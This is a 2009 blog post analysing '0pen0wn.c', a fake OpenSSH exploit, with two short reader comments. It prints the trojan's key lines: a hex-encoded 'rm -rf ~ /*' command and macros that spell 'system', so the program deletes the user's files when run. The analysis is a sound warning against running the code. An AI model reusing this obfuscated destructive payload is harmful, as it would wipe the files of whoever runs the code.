Friday, July 17, 2009

0pen0wn.c uncovered

A friend forwarded me a version of 0pen0wn.c, which claims to be
a OpenSSH 5.2 0day exploit (http://pastebin.com/m86228fd),
a couple of days ago. He did not start it because it looked much
like a trojan. At first i was searching for the typical call of
system() without finding
it, but it is there.

The important lines are the following:

char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

#define build_frem(x,y,a,b,c) a##c##a##x##y##b
#define fremote build_frem(t,e,s,m,y)

int main(int argc, char **argv){
...
char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
...

The jmpcode apears to be "rm -rf ~ /* 2> /dev/null &".
This means, that the string fremote(jmpcode) in the very
begining of main is:
fremote(rm -rf ~ /* 2> /dev/null &)


Now lets have a look at the macros which build fremote:

#define fremote build_frem(t,e,s,m,y)
is substituted by build_frem(t,e,s,m,y) a##c##a##x##y##b
So x=t, y=e, a=s, b=m, c=y and the macro expands to
s##y##s##t##e##m which is "system".

Now you have the call system("rm -rf ~ /* 2> /dev/null &")
in the second line of main!

I really wonder, why the authors did not make it public
to many people to do more damage, but if they do one day:

Don't start it! ;-D

2 comments:

  1. so, it deletes everything on your drive right? LOL do you think there's a real one in the wild?

    ReplyDelete
  2. Yes, you can find users on google who have "succesfully" compiled and runned the code.

    bonkers.

    ReplyDelete